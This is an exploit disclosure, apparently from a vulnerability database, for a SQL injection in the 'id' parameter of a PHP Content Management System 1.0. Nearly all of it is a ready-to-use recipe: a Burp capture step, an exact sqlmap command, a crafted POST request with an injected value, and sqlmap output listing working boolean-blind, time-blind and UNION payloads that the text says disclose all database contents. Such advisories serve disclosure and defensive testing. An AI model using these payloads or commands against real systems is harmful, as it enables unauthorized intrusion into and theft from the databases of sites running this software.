Content Management System 1.0 id SQL Injection

2020.12.18
Credit: Zhayi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Content Management System 1.0 - 'id' SQL Injection # Exploit Author: Zhayi (Zeo) # Date: 2020-12-14 # Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code # Affected Version: Version 1 # Category: Web Application # Tested on: WINDOWS 10 Step 1. Capture the request of the " http://127.0.0.1/ajax.php?action=load_list" page in burpsute Step 2. Save POST the packet Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast --dbs " Step 4. This will inject successfully and you will have an information disclosure of all databases contents POST the packet --- POST /ajax.php?action=load_list HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Length: 63 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3 Origin: http://127.0.0.1 Referer: http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0 --- SQLMAP --- Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689 AND 'ZPQO'='ZPQO&start=0 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT 6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0 Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL-- -&start=0 ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top